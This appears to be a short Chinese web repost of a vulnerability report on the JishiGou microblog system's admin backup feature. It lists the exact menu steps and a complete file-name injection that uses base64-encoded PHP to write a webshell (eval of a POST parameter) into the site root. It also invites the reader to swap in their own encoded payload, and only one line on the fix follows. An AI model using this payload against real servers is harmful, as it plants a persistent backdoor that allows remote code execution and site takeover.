来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 记事狗微博系统,后台存在设计缺陷,可导致进入后台者获得shell1.系统工具-数据备份-自定义备份-选择一张数据量较小的表-更多选项-选择压缩备份文件-多分卷压缩成一个文件2.在备份...
|
记事狗微博系统,后台存在设计缺陷,可导致进入后台者获得shell
1.系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件 2.在备份文件名中输入 ');file_put_contents(base64_decode('YS5waHA='),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbYV0pPz4='));(' www.2cto.com 备份成功就在网站根目录生成a.php,内容为<?php eval($_POST[a])?> 其中base64_decode中编码自己改吧    修复方案: 备份文件名输入验证,过滤字符 作者 lxsec |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
